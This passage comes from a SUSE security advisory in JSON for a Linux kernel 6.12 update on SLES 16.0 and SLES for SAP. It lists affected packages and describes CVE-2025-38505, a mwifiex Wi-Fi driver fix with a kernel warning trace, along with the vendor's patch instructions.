"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38423"
},
{
"cve": "CVE-2025-38505",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38505"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mwifiex: discard erroneous disassoc frames on STA interface\n\nWhen operating in concurrent STA/AP mode with host MLME enabled,\nthe firmware incorrectly sends disassociation frames to the STA\ninterface when clients disconnect from the AP interface.\nThis causes kernel warnings as the STA interface processes\ndisconnect events that don\u0027t apply to it:\n\n[ 1303.240540] WARNING: CPU: 0 PID: 513 at net/wireless/mlme.c:141 cfg80211_process_disassoc+0x78/0xec [cfg80211]\n[ 1303.250861] Modules linked in: 8021q garp stp mrp llc rfcomm bnep btnxpuart nls_iso8859_1 nls_cp437 onboard_us\n[ 1303.327651] CPU: 0 UID: 0 PID: 513 Comm: kworker/u9:2 Not tainted 6.16.0-rc1+ #3 PREEMPT\n[ 1303.335937] Hardware name: Toradex Verdin AM62 WB on Verdin Development Board (DT)\n[ 1303.343588] Workqueue: MWIFIEX_RX_WORK_QUEUE mwifiex_rx_work_queue [mwifiex]\n[ 1303.350856] pstate: 60000005 (nZCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n[ 1303.357904] pc : cfg80211_process_disassoc+0x78/0xec [cfg80211]\n[ 1303.364065] lr : cfg80211_process_disassoc+0x70/0xec [cfg80211]\n[ 1303.370221] sp : ffff800083053be0\n[ 1303.373590] x29: ffff800083053be0 x28: 0000000000000000 x27: 0000000000000000\n[ 1303.380855] x26: 0000000000000000 x25: 00000000ffffffff x24: ffff000002c5b8ae\n[ 1303.388120] x23: ffff000002c5b884 x22: 0000000000000001 x21: 0000000000000008\n[ 1303.395382] x20: ffff000002c5b8ae x19: ffff0000064dd408 x18: 0000000000000006\n[ 1303.402646] x17: 3a36333a61623a30 x16: 32206d6f72662063 x15: ffff800080bfe048\n[ 1303.409910] x14: ffff000003625300 x13: 0000000000000001 x12: 0000000000000000\n[ 1303.417173] x11: 0000000000000002 x10: ffff000003958600 x9 : ffff000003625300\n[ 1303.424434] x8 : ffff00003fd9ef40 x7 : ffff0000039fc280 x6 : 0000000000000002\n[ 1303.431695] x5 : ffff0000038976d4 x4 : 0000000000000000 x3 : 0000000000003186\n[ 1303.438956] x2 : 000000004836ba20 x1 : 0000000000006986 x0 : 00000000d00479de\n[ 1303.446221] Call trace:\n[ 1303.448722] cfg80211_process_disassoc+0x78/0xec [cfg80211] (P)\n[ 1303.454894] cfg80211_rx_mlme_mgmt+0x64/0xf8 [cfg80211]\n[ 1303.460362] mwifiex_process_mgmt_packet+0x1ec/0x460 [mwifiex]\n[ 1303.466380] mwifiex_process_sta_rx_packet+0x1bc/0x2a0 [mwifiex]\n[ 1303.472573] mwifiex_handle_rx_packet+0xb4/0x13c [mwifiex]\n[ 1303.478243] mwifiex_rx_work_queue+0x158/0x198 [mwifiex]\n[ 1303.483734] process_one_work+0x14c/0x28c\n[ 1303.487845] worker_thread+0x2cc/0x3d4\n[ 1303.491680] kthread+0x12c/0x208\n[ 1303.495014] ret_from_fork+0x10/0x20\n\nAdd validation in the STA receive path to verify that disassoc/deauth\nframes originate from the connected AP. Frames that fail this check\nare discarded early, preventing them from reaching the MLME layer and\ntriggering WARN_ON().\n\nThis filtering logic is similar with that used in the\nieee80211_rx_mgmt_disassoc() function in mac80211, which drops\ndisassoc frames that don\u0027t match the current BSSID\n(!ether_addr_equal(mgmt-\u003ebssid, sdata-\u003evif.cfg.ap_addr)), ensuring\nonly relevant frames are processed.\n\nTested on:\n- 8997 with FW 16.68.1.p197",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38505",
"url": "https://www.suse.com/security/cve/CVE-2025-38505"
},
{
"category": "external",
"summary": "SUSE Bug 1248185 for CVE-2025-38505",
"url": "https://bugzilla.suse.com/1248185"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
